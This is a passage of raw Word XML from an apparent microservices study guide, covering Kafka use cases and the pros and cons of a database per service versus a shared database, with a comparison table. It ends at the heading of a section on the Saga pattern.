    <w:p w14:paraId="684989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mon Use Cases for Kafka in Event-Driven Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6821F4A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Services can communicate via events rather than direct API calls, allowing for better fault tolerance and easier scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B34C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 Aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka can collect logs from various services, process them in real-time, and provide insights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9780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Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka can be used to stream data into analytics platforms or data lakes for real-time data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C3C4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ourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka can act as the event store in event sourcing architectures, where every change to the state of an entity is captured as an event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E07B6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Pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka enables real-time data flow between systems, such as streaming data from a database to a data warehouse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC016D"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F0AF7">
          <v:rect id="_x0000_i2987" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FFA3F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2A420DC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988" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680F904" w14:textId="2FDC54CC" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B07073">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="717" w:name="_Toc197867931"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Database per service vs Shared Database: Pros and cons</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="717"/>
    </w:p>
    <w:p w14:paraId="4E341081" w14:textId="36D5A524"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 vs Shared Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69F7A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microservices architecture, one of the key decisions is how to manage the data layer. You can choose either </w:t>
      </w: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Both approaches have their pros and cons, and the choice depends on the specific needs and goals of your system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024EDD3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9632D">
          <v:rect id="_x0000_i2989" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26898A7B"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Database per Service (Decentralized Data Management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592621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each microservice has its own dedicated database. Each service is responsible for its own data and database schema, and it doesn’t directly interact with the data of other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC8ADF8"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CC6D8B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37595B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can be developed, deployed, and scaled independently without worrying about the data layer of other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE4DA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an evolve their databases independently, allowing more flexibility in choosing database technologies that best fit the service’s requirements (e.g., SQL, NoSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5B8E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r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC3BA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fully autonomous and don't rely on others for accessing their data, allowing them to be more resilient. One service’s failure doesn’t bring down the others due to shared data dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC95F9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mproved Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64A2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s database can be scaled independently based on its load. For example, if one service is experiencing high traffic, you can scale its database without affecting others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6A4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etter Security and Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60966A5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each service has its own database, access control is easier to enforce, reducing the risk of accidental or malicious access to other services’ data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A1A1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dependent Schema Evolution</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3846DA3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the services are isolated, they can evolve their schemas without impacting other services. This makes it easier to implement database changes (e.g., migrations, table design).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D3F6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Disaster Recovery and Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE51AD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less likely to be affected by database failures. A failure in one database does not affect the others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6343A98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5CCABA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r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2750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ata duplication may occur, as different services might need the same data but must store it separately. This can lead to inconsistencies and extra storage overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AF25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Data Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2FB88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Managing consistency between services can be tricky. Since each service has its own database, achieving strong consistency (ACID) across services is difficult and may require eventual consistency or techniques lik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70C607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creased Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780A586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anaging multiple databases adds operational complexity. You have to manage different types of databases, backup strategies, and migrations for each service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEEC5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cross-service transactions (if needed) can be more challenging without a global transaction manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46246E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Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FB24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need to communicate with each other via APIs, and synchronizing data between services (e.g., for reporting or analytics) can require complex data pipelines or event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F866245"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E5D5C">
          <v:rect id="_x0000_i2990" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7174D8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Shared Database (Centralized Data Management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A98A0E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all microservices share a common database. They access and modify the same data stored in the same database schema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62C59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442363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Data Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B270DC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using the same database, data is centralized, making it easier to manage and access. You don't need to deal with data synchronization between databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5448B3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r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040CF4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database is consistent because there is a single source of truth for all data. Transactions across services are easier to manage using traditional ACID transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0008A6C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ster Development</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F1E8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Data Duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5598ACB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ata duplication occurs, as all services access and share the same data store, reducing storage requirements and ensuring consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2711D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EE36C3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ight Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC874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the shared database, which can make it harder to scale, evolve, and deploy services independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D7E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hanges to the database schema can affect all services that rely on it, leading to coordination overhead when changes are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61048C2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ngle Point of Failure</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06815EA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database goes down, it can bring down all services that rely on it. This creates a single point of failure, affecting the availability of the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1906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 Bottleneck</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570D1B8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ving all services access the same database can lead to contention and performance issues, especially when multiple services access the database simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE6917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ing the database to meet the needs of multiple services can be difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24685B2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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527CB7F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services are tied to the same database technology and schema. If one service requires a different database type (e.g., NoSQL), it becomes difficult to introduce without affecting others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB24D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fficulty in Autonomous Evolution</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B08A2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tied to the same database schema, any changes to the database schema could impact multiple services. This makes it hard to evolve services independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB17374"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06C1D">
          <v:rect id="_x0000_i2991" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA70F3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Each Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FEB3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preferred when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B439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You need full autonomy between microservices, especially when services are loosely coupled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3C73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different data storage needs (e.g., some services need SQL, others need NoSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629DBC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scale services independently without affecting others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0A5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can tolerate the complexity of managing multiple databases and eventual consistency between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B9BE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preferred when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5309FB7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minimize the complexity of managing multiple databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4100BD6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are highly interdependent, and tight data consistency is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546EE2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have a relatively small system or a monolithic application that’s being refactored into microservices, and you don’t need the overhead of managing separate databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF7DAA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905845">
          <v:rect id="_x0000_i2992" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D098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3997"/>
        <w:gridCol w:w="4698"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="07D7706A" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB40C8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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6250D07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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="515A14A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hared Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="52636370" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F003D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upling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7753342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oose coupling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E05DFB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ight coupling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="515F1890" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EAAD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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B049FB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services can be scaled independently</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B6F8C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fficult to scale as a whole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="4F2A1541" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="483E38F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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="161BF76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ual consistency, complex transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EE1F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consistency (ACID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="5FADE34D" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7E4F2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ility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34AF84A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lexibility, independent database choice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C7FD8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flexibility (shared technology)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="4944469F" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF5FA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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="738C990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manage, more overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73D83A5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r to manage, but limited scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="7E95A773" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B5622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ilure Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126AA93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ault tolerance (failures isolated to a service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20EB512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gle point of failure (database downtime impacts all services)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="1D2ED22A" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E45D5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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="682B9A6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otential for data duplication across services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BCFC7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uplication, centralized data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="2CDEA2F6" w14:textId="77777777" w:rsidTr="00D056EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28415E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EDD3FF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its own database, fully autonomous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38EB105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shared DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="741E8A8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9730B4">
          <v:rect id="_x0000_i2993" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B59B6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1C18E04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994" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27B442" w14:textId="7BB95433" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="004B7F50">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="718" w:name="_Toc197867932"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Saga Pattern for distributed transactions in microservices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="718"/>
    </w:p>
    <w:p w14:paraId="6AFA3E37" w14:textId="3E1943C5"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Pattern for Distributed Transactions in Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D31BE7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w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
